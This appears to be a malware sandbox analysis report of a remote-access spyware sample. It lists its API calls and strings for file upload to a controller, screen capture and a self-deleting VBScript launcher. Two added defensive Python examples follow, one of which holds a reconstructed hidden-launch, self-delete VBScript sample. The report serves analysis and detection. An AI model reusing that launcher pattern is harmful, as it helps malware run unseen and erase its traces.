                                                                                            • String ID:
                                                                                            APIs
                                                                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                            • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                            • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                            • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                            APIs
                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B846
                                                                                            • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B88A
                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0041BB54
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseEnumOpen
                                                                                            • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                            APIs
                                                                                            • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAE9
                                                                                            • GetCursorPos.USER32(?), ref: 0041CAF8
                                                                                            • SetForegroundWindow.USER32(?), ref: 0041CB01
                                                                                            • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
                                                                                            • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB6C
                                                                                            • ExitProcess.KERNEL32 ref: 0041CB74
                                                                                            • CreatePopupMenu.USER32 ref: 0041CB7A
                                                                                            • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                            • String ID: Close
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free$Info
                                                                                            • String ID:
                                                                                            APIs
                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                                                            • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                                                            • __aulldiv.LIBCMT ref: 00407FE9
                                                                                            • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                                                            • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                                                            • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                                                            • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                                                            APIs
                                                                                            • ___free_lconv_mon.LIBCMT ref: 004500B1
                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
                                                                                              • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8
                                                                                            • _free.LIBCMT ref: 004500A6
                                                                                              • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                            • _free.LIBCMT ref: 004500C8
                                                                                            • _free.LIBCMT ref: 004500DD
                                                                                            • _free.LIBCMT ref: 004500E8
                                                                                            • _free.LIBCMT ref: 0045010A
                                                                                            • _free.LIBCMT ref: 0045011D
                                                                                            • _free.LIBCMT ref: 0045012B
                                                                                            • _free.LIBCMT ref: 00450136
                                                                                            • _free.LIBCMT ref: 0045016E
                                                                                            • _free.LIBCMT ref: 00450175
                                                                                            • _free.LIBCMT ref: 00450192
                                                                                            • _free.LIBCMT ref: 004501AA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                            • String ID:
                                                                                            APIs
                                                                                            • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                                              • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                                            • _free.LIBCMT ref: 10007CFB
                                                                                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                            • _free.LIBCMT ref: 10007D1D
                                                                                            • _free.LIBCMT ref: 10007D32
                                                                                            • _free.LIBCMT ref: 10007D3D
                                                                                            • _free.LIBCMT ref: 10007D5F
                                                                                            • _free.LIBCMT ref: 10007D72
                                                                                            • _free.LIBCMT ref: 10007D80
                                                                                            • _free.LIBCMT ref: 10007D8B
                                                                                            • _free.LIBCMT ref: 10007DC3
                                                                                            • _free.LIBCMT ref: 10007DCA
                                                                                            • _free.LIBCMT ref: 10007DE7
                                                                                            • _free.LIBCMT ref: 10007DFF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                            • String ID:
                                                                                            • API String ID: 161543041-0
                                                                                            • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                            • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                                                            • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                            • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 0041912D
                                                                                            • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041915F
                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
                                                                                            • Sleep.KERNEL32(000003E8), ref: 0041926D
                                                                                            • GetLocalTime.KERNEL32(?), ref: 0041927C
                                                                                            • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                            • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                            • API String ID: 489098229-65789007
                                                                                            • Opcode ID: ee5279f22d5bbb827794aadffa3670e1af9e2b2f384e592815bd78e9c7a8941e
                                                                                            • Instruction ID: b922dce7c629cfc9b1bb11cb74a08c0e3353b39699bf4d86e46594d10c943285
                                                                                            • Opcode Fuzzy Hash: ee5279f22d5bbb827794aadffa3670e1af9e2b2f384e592815bd78e9c7a8941e
                                                                                            • Instruction Fuzzy Hash: 33519F71A002449ACB14BBB5C856AFE7BA9AB55304F00407FF84AB71D2EF3C5E85C799
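Added example, not part of the Joe Sandbox report or of the sample's own code: the string table above shows the capture-file naming formats `time_%04i%02i%02i_%02i%02i%02i` and `wnd_%04i%02i%02i_%02i%02i%02i`, filled from GetLocalTime after GdiplusStartup and CreateDirectoryW, and a later function in the same dump (the MultiByteToWideChar wrapper) carries the strftime format `%Y-%m-%d %H.%M`. The Python below parses both into datetimes and merges them into one timeline, which is what a responder wants when triaging a recovered working directory. The file extension, the reading of `%Y-%m-%d %H.%M` as a log-line prefix, and the sample inputs are assumptions, not facts from the report.

```python
import re
from datetime import datetime
from typing import Optional

# Capture-file name formats from this function's string table:
#   "time_%04i%02i%02i_%02i%02i%02i" and "wnd_%04i%02i%02i_%02i%02i%02i"
# i.e. <prefix>_YYYYMMDD_HHMMSS built from GetLocalTime fields. The
# extension is an assumption (the report shows none), so it is optional.
CAPTURE_NAME_RE = re.compile(
    r"^(?P<kind>time|wnd)_(?P<y>\d{4})(?P<mo>\d{2})(?P<d>\d{2})"
    r"_(?P<h>\d{2})(?P<mi>\d{2})(?P<s>\d{2})(?:\.[A-Za-z0-9]+)?$"
)

# strftime-style format seen in the MultiByteToWideChar wrapper further down.
# Treating it as a log-line timestamp prefix is an assumption.
LOG_TS_FMT = "%Y-%m-%d %H.%M"
LOG_TS_RE = re.compile(r"(\d{4}-\d{2}-\d{2} \d{2}\.\d{2})")


def parse_capture_name(name: str) -> Optional[dict]:
    """Return {'kind', 'timestamp'} for a matching capture name, else None."""
    m = CAPTURE_NAME_RE.match(name)
    if m is None:
        return None
    try:
        ts = datetime(int(m["y"]), int(m["mo"]), int(m["d"]),
                      int(m["h"]), int(m["mi"]), int(m["s"]))
    except ValueError:  # e.g. month 13: looks like the pattern but is not a real capture
        return None
    return {"kind": m["kind"], "timestamp": ts}


def parse_log_timestamp(line: str) -> Optional[datetime]:
    """Return the first '%Y-%m-%d %H.%M' timestamp found in a line, else None."""
    m = LOG_TS_RE.search(line)
    if m is None:
        return None
    try:
        return datetime.strptime(m.group(1), LOG_TS_FMT)
    except ValueError:
        return None


def build_timeline(names, log_lines):
    """Merge capture names and log lines into one list of (time, kind, detail) sorted by time."""
    events = []
    for n in names:
        p = parse_capture_name(n)
        if p:
            events.append((p["timestamp"], p["kind"], n))
    for ln in log_lines:
        ts = parse_log_timestamp(ln)
        if ts:
            events.append((ts, "log", ln))
    events.sort(key=lambda e: e[0])
    return events


# Constructed sample input (not taken from the report): capture names and log lines.
SAMPLE_NAMES = ["time_20241206_143501.jpg", "wnd_20241206_143455", "readme.txt"]
SAMPLE_LOG = ["2024-12-06 14.34 [Notepad]", "no timestamp here", "2024-12-06 14.36 [cmd.exe]"]

if __name__ == "__main__":
    for ts, kind, detail in build_timeline(SAMPLE_NAMES, SAMPLE_LOG):
        print(ts.isoformat(), kind, detail)
```

Run it against a directory listing and the keylog lines you have recovered; anything that parses but falls outside the incident window is worth a second look, since the timestamps come from the victim's local clock.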
                                                                                            APIs
                                                                                              • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                              • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                              • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                              • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                              • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                                                            • ExitProcess.KERNEL32 ref: 0040C832
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                            • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                            • API String ID: 1913171305-390638927
                                                                                            • Opcode ID: dd841bb82cc608f79e660caa83b4a906fc9399d47d9f20e4a7acba44519bdb89
                                                                                            • Instruction ID: a795a6540db69397e2c5d2b70f340dd787df27bacd58b350937fb1c0aad7b7c4
                                                                                            • Opcode Fuzzy Hash: dd841bb82cc608f79e660caa83b4a906fc9399d47d9f20e4a7acba44519bdb89
                                                                                            • Instruction Fuzzy Hash: A2416D329001185ACB14F762DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
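Added example, not part of the Joe Sandbox report or of the sample's own code: the strings in this function (`.vbs`, `Temp`, `exepath`, `CreateObject("WScript.Shell").Run "cmd /c ""`, `""", 0`, `CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)`) together with ShellExecuteW(`open`) and ExitProcess point to a dropped VBScript that relaunches an executable with a hidden window and then deletes itself. The Python below is a triage check for that pattern in recovered `.vbs` files. How the fragments are assembled in the sample script, and the path in it, are assumptions; the report shows only the fragments.

```python
import re

# String fragments the report recovered from this function:
#   CreateObject("WScript.Shell").Run "cmd /c ""    (launch line, front half)
#   """, 0                                           (launch line, back half: "" is an escaped
#                                                     quote inside a VBScript literal, 0 = hidden window)
#   CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
#   .vbs  Temp  exepath  open
# Joining them as  Run "cmd /c ""<path>""", 0  is an assumption, not something the page states.

# Launch line: WScript.Shell.Run "cmd /c ""<path>""", <window style>
RUN_RE = re.compile(
    r'CreateObject\("WScript\.Shell"\)\.Run\s+"cmd\s+/c\s+""(?P<path>[^"]+)"""\s*,\s*(?P<style>\d+)',
    re.IGNORECASE,
)
# Self-delete line: FileSystemObject.DeleteFile on the running script's own path
SELF_DELETE_RE = re.compile(
    r'CreateObject\("Scripting\.FileSystemObject"\)\.DeleteFile\(\s*WScript\.ScriptFullName\s*\)',
    re.IGNORECASE,
)


def analyze_vbs(text: str) -> dict:
    """Flag a VBScript that launches an executable hidden and then deletes itself."""
    run = RUN_RE.search(text)
    selfdel = SELF_DELETE_RE.search(text)
    result = {
        "launches": run.group("path") if run else None,
        "hidden_window": bool(run) and run.group("style") == "0",
        "self_deletes": selfdel is not None,
    }
    # Both halves together are the relaunch-and-cover-tracks pattern; either alone is common in benign scripts.
    result["suspicious"] = result["launches"] is not None and result["self_deletes"]
    return result


def scan_text_files(files: dict) -> list:
    """files: {name: content}. Return the names whose content shows the full pattern."""
    return [name for name, body in files.items() if analyze_vbs(body)["suspicious"]]


# Constructed sample (not from the report): one plausible reconstruction of the dropped script,
# and a benign script that uses FileSystemObject without the pattern.
SAMPLE_VBS = (
    'CreateObject("WScript.Shell").Run "cmd /c ""'
    'C:\\Users\\victim\\AppData\\Local\\Temp\\payload.exe""", 0\r\n'
    'CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\r\n'
)
BENIGN_VBS = 'Set fso = CreateObject("Scripting.FileSystemObject")\r\nMsgBox fso.GetTempName\r\n'

if __name__ == "__main__":
    print(analyze_vbs(SAMPLE_VBS))
    print(scan_text_files({"update.vbs": SAMPLE_VBS, "setup.vbs": BENIGN_VBS}))
```

Because the script deletes itself, the file is usually gone by the time a responder looks; the same regexes can be run over Sysmon/command-line telemetry that captured the `wscript.exe` invocation or over a forensic image's unallocated space instead of over live files.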
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free
                                                                                            • String ID:
                                                                                            • API String ID: 269201875-0
                                                                                            • Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                            • Instruction ID: 48066223020562dfe8895eb3edc0e70975ef38ab3c96fc6f1fb07286cb8ca08d
                                                                                            • Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
                                                                                            • Instruction Fuzzy Hash: 2BC15772D80204BFEB20DBA9CC82FDE77F89B45704F15416AFA04FB282D6749D458B58
                                                                                            APIs
                                                                                              • Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000,?,00454A2B,00000000,0000000C), ref: 0045466D
                                                                                            • GetLastError.KERNEL32 ref: 00454A96
                                                                                            • __dosmaperr.LIBCMT ref: 00454A9D
                                                                                            • GetFileType.KERNEL32(00000000), ref: 00454AA9
                                                                                            • GetLastError.KERNEL32 ref: 00454AB3
                                                                                            • __dosmaperr.LIBCMT ref: 00454ABC
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00454ADC
                                                                                            • CloseHandle.KERNEL32(?), ref: 00454C26
                                                                                            • GetLastError.KERNEL32 ref: 00454C58
                                                                                            • __dosmaperr.LIBCMT ref: 00454C5F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                            • String ID: H
                                                                                            • API String ID: 4237864984-2852464175
                                                                                            • Opcode ID: 43154248a50fd66e96ac6d70bada307b7577a7ac671062952f04f408382b00d8
                                                                                            • Instruction ID: 324c09394b40af715295ff654573b8bda7a64cd12b4111e7ce26936e53f9a861
                                                                                            • Opcode Fuzzy Hash: 43154248a50fd66e96ac6d70bada307b7577a7ac671062952f04f408382b00d8
                                                                                            • Instruction Fuzzy Hash: B0A148329041044FDF19EF78D8427AE7BA0AB86319F14015EFC159F392DB398C86C75A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 65535$udp
                                                                                            • API String ID: 0-1267037602
                                                                                            • Opcode ID: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                            • Instruction ID: a76ad32841e4dbbb66723cf4e0556afe3febbbe66cdf8f55616d13ac9502c32b
                                                                                            • Opcode Fuzzy Hash: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                            • Instruction Fuzzy Hash: 9D4118716083019BD7209F29E905BAB7BD8EF85706F04082FF84197391E76DCEC186AE
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393B9
                                                                                            • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C6
                                                                                            • __dosmaperr.LIBCMT ref: 004393CD
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393F9
                                                                                            • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439403
                                                                                            • __dosmaperr.LIBCMT ref: 0043940A
                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043944D
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439457
                                                                                            • __dosmaperr.LIBCMT ref: 0043945E
                                                                                            • _free.LIBCMT ref: 0043946A
                                                                                            • _free.LIBCMT ref: 00439471
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                            • String ID:
                                                                                            • API String ID: 2441525078-0
                                                                                            • Opcode ID: 684e6fef7141b114c3b5ff973dde56bcea396d28ee1fdac90182f4155713f89e
                                                                                            • Instruction ID: 902c93592471d116807dca9985149206a76c62e8192f2f9a6cc20a0486345b12
                                                                                            • Opcode Fuzzy Hash: 684e6fef7141b114c3b5ff973dde56bcea396d28ee1fdac90182f4155713f89e
                                                                                            • Instruction Fuzzy Hash: F531F17140820ABBEF11AFA5DC449AF3B78EF09364F14016AF81066291DB79CC12DBA9
                                                                                            APIs
                                                                                            • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                                                            • TranslateMessage.USER32(?), ref: 00404F30
                                                                                            • DispatchMessageA.USER32(?), ref: 00404F3B
                                                                                            • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                                                                            • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                                                              • Part of subcall function 00404468: send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                            • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                            • API String ID: 2956720200-749203953
